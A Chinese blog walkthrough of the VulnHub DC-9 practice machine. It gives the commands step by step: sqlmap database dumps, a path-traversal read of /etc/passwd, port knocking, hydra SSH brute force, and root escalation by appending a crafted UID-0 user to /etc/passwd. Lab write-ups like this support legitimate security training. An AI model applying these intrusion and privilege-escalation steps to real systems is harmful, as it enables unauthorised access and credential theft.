VulnHub靶机 DC-9打靶 渗透详细流程

2024-05-12 600 0

VulnHub靶机 DC-9打靶实战 渗透详细过程

一、将靶机配置导入到虚拟机当中

靶机地址:

https://www.vulnhub.com/entry/dc-9,412/

VulnHub靶机 DC-9打靶 渗透详细流程插图

二、渗透测试

主机发现

通过使用arp-scan或者nmap进行主机发现

arp-scan -l

VulnHub靶机 DC-9打靶 渗透详细流程插图1

端口扫描

发现主机后进行信息收集,端口扫描

nmap -p- 192.168.43.5

VulnHub靶机 DC-9打靶 渗透详细流程插图2

开放HTTP80端口和SSH22端口,但是发现22端口为filtered状态,然后接下来查看HTTP的服务详情

nmap -p80 -sV -A 192.168.43.5

VulnHub靶机 DC-9打靶 渗透详细流程插图3

访问web界面

VulnHub靶机 DC-9打靶 渗透详细流程插图4

VulnHub靶机 DC-9打靶 渗透详细流程插图5

指纹探测

whatweb http://192.168.43.5/index.php

VulnHub靶机 DC-9打靶 渗透详细流程插图6

目录扫描

dirsearch -u http://192.168.43.5/ -i 200

VulnHub靶机 DC-9打靶 渗透详细流程插图7

出来的目录基本都是在web界面点击选项所触发的目录

Web渗透

SQL注入

在搜索栏下发现有交互内容,输入一下信息并无输出什么,抓包尝试SQL注入

VulnHub靶机 DC-9打靶 渗透详细流程插图8

抓取数据包,通过FUZZ测试SQL注入,发现有回显点,页面变化

VulnHub靶机 DC-9打靶 渗透详细流程插图9

VulnHub靶机 DC-9打靶 渗透详细流程插图10

页面发送变化,返回信息

VulnHub靶机 DC-9打靶 渗透详细流程插图11

保存原始数据包,直接放入到sqlmap当中进行执行

//测试SQL注入,判断当前数据库,同时是否为DBA
python sqlmap.py -r sql.txt --random-agent --batch --current-db --is-dba --dbs

成功注入,发现当前使用的数据库,但并不是DBA

VulnHub靶机 DC-9打靶 渗透详细流程插图12

脱库

python sqlmap.py -r sql.txt --random-agent --batch --current-db --is-dba --dbs -D Staff --dump

VulnHub靶机 DC-9打靶 渗透详细流程插图13

users数据表当中发现用户名和密码,将密码进行md5解密

VulnHub靶机 DC-9打靶 渗透详细流程插图14

VulnHub靶机 DC-9打靶 渗透详细流程插图15

用户名:admin
密码:transorbital1

由于使用的当前数据库为Staff,所以可以直接判断出此用户名和密码即为后台管理员用户名和密码。

知道此,那么还有另一个数据库,继续脱库

python sqlmap.py -r sql.txt --random-agent --batch --current-db --is-dba --dbs -D users --dump

拿到大量的用户名和密码信息,保存下来

VulnHub靶机 DC-9打靶 渗透详细流程插图16

登入后台

拿到的用户名和密码进行后台,登录进行,发现低端爆出文件未找到的信息,可能存在文件包含,根据提示尝试一下,成功读取/etc/passwd

VulnHub靶机 DC-9打靶 渗透详细流程插图17

VulnHub靶机 DC-9打靶 渗透详细流程插图18

文件包含

http://192.168.43.5/welcome.php?file=../../../../etc/passwd

VulnHub靶机 DC-9打靶 渗透详细流程插图19

VulnHub靶机 DC-9打靶 渗透详细流程插图20

通过/etc/passwd可得拥有很多的用户名,其中包括users数据库当中的用户名

VulnHub靶机 DC-9打靶 渗透详细流程插图21

VulnHub靶机 DC-9打靶 渗透详细流程插图22

SSH爆破

将之前保存下来的这些用户名和密码,进行爆破

hydra -L user.txt -P passwords.txt ssh://192.168.43.5

提权

ssh爆破得到三个用户名和密码,分别登录即可。

ps:如果ssh不能登录,是因为22端口没有打开,流量过滤了,在前面信息收集当中发现22端口是关闭的。但我这里通过爆破后进行ssh登录时可直接登录的,可能在前面端口扫描时触发了规则导致打开。

详细参考:安全系列之端口敲门服务

如果不能ssh连接原因如下:

VulnHub靶机 DC-9打靶 渗透详细流程插图23

存在knockd服务。
该服务通过动态的添加iptables规则来隐藏系统开启的服务,使用自定义的一系列序列号来"敲门",使系统开启需要访问的服务端口,才能对外访问。
不使用时,再使用自定义的序列号来"关门",将端口关闭,不对外监听。进一步提升了服务和系统的安全

//配置文件路径
默认配置文件是:/etc/knockd.conf

VulnHub靶机 DC-9打靶 渗透详细流程插图24

//自定义端口后,依次对其进行敲门,然后就可以开启ssh服务进行连接了
//命令如下:
nmap 192.168.43.5 -p 7469
nmap 192.168.43.5 -p 8475
nmap 192.168.43.5 -p 9842
//执行完成过后,重新扫描22端口,即可发现ssh服务已经开启,可以访问

VulnHub靶机 DC-9打靶 渗透详细流程插图25

ssh爆破,使用hydra工具进行爆破,等待即可

VulnHub靶机 DC-9打靶 渗透详细流程插图26

chandlerb用户:

VulnHub靶机 DC-9打靶 渗透详细流程插图27

joeyt用户:

VulnHub靶机 DC-9打靶 渗透详细流程插图28

janitor用户:

VulnHub靶机 DC-9打靶 渗透详细流程插图29

通过find命令和sudo -l 命令三者用户皆无得到可利用信息

但是通过三者发现在janitor用户的家目录下多了一个隐藏文件,查看后发现为密码文件,那么将这些密码添加到之前的字典当中,再次爆破一次

hydra -L user.txt -P passwords.txt ssh://192.168.43.5

VulnHub靶机 DC-9打靶 渗透详细流程插图30

发现成功爆破出新的用户登录信息,进行登录。或者直接su切换也可

ssh [email protected]

VulnHub靶机 DC-9打靶 渗透详细流程插图31

sudo -l命令查看到以root权限运行的文件,进行查看

sudo -l

test为可执行文件

VulnHub靶机 DC-9打靶 渗透详细流程插图32

VulnHub靶机 DC-9打靶 渗透详细流程插图33

查看所在目录的一些信息,寻找可利用内容

VulnHub靶机 DC-9打靶 渗透详细流程插图34

返回上级目录查找到py文件,查看脚本内容

python脚本意思为将参数1进行读取,将参数1的内容写入到参数2当中

VulnHub靶机 DC-9打靶 渗透详细流程插图35

那么接下来就可以进行构造/etc/passwd文件当中的信息,进行追加用户信息即可提权,仿照/etc/passwd文件当中内容进行构造信息

//etc/passwd下的root用户信息
root:x:0:0:root:/root:/bin/bash

//根据root信息,构造用户信息追加到/etc/passwd文件当中,添加admin用户
admin:$1$123$Ok9FhQy4YioYZeBPwQgm3/:0:0:admin:/root:/bin/bash

ps:使用openssl生成密码即可

openssl passwd -1 -salt 123 admin
//-1为MD5加密算法,-salt指定盐值,后面为密码
//将上述构造的语句写入到文件当中

VulnHub靶机 DC-9打靶 渗透详细流程插图36

将构造的信息保存到一个文件当中,然后接下来执行text即可

目前的/etc/passwd当中没有新增用户

VulnHub靶机 DC-9打靶 渗透详细流程插图38

执行后:

sudo /opt/devstuff/dist/test/test /tmp/passwd /etc/passwd

VulnHub靶机 DC-9打靶 渗透详细流程插图39

VulnHub靶机 DC-9打靶 渗透详细流程插图40

成功追加,直接su切换admin用户,输入密码,成功提权

su admin
Password:admin

VulnHub靶机 DC-9打靶 渗透详细流程插图41

思路:主机发现---端口扫描---服务弹窗---指纹识别---Web渗透SQL注入---登入后台---文件包含---"敲门"打开22端口---SSH爆破---得到相关用户信息并远程登录---提权---分别搜寻三个用户下的目录文件---得到带有root权限的执行命令---分析并成功提权


VulnHub靶机 DC靶机系列 通关手册

DC-1:Vulnhub靶机 DC-1 渗透详细过程

DC-2:Vulnhub靶机 DC-2 渗透详细过程

DC-3:Vulnhub 靶机 DC-3 实战系列 渗透详细过程

DC-4:VulnHub系列 DC-4靶机 渗透详细过程

DC-5:VulnHub靶机 DC-5 打靶 渗透测试详细过程

DC-6:Vulnhub靶机 DC-6 打靶实战 详细渗透流程

DC-7:VulnHub靶机 DC-7 打靶 渗透详细流程

DC-8:VulnHub靶机 DC-8 打靶实战 详细渗透过程

DC-9:VulnHub靶机 DC-9 靶机 详细渗透过程


文章不妥之处,欢迎批评指正!


4A评测 - 免责申明

本站提供的一切软件、教程和内容信息仅限用于学习和研究目的。

不得将上述内容用于商业或者非法用途,否则一切后果请用户自负。

本站信息来自网络,版权争议与本站无关。您必须在下载后的24个小时之内,从您的电脑或手机中彻底删除上述内容。

如果您喜欢该程序,请支持正版,购买注册,得到更好的正版服务。如有侵权请邮件与我们联系处理。敬请谅解!

程序来源网络,不确保不包含木马病毒等危险内容,请在确保安全的情况下或使用虚拟机使用。

侵权违规投诉邮箱:4ablog168#gmail.com(#换成@)

相关文章

webpack打包站点,js文件名批量获取思路
加密对抗靶场enctypt——labs通关
【论文速读】| 注意力是实现基于大语言模型的代码漏洞定位的关键
蓝队技术——Sysmon识别检测宏病毒
内网渗透学习|powershell上线cs
LLM attack中的API调用安全问题及靶场实践

发布评论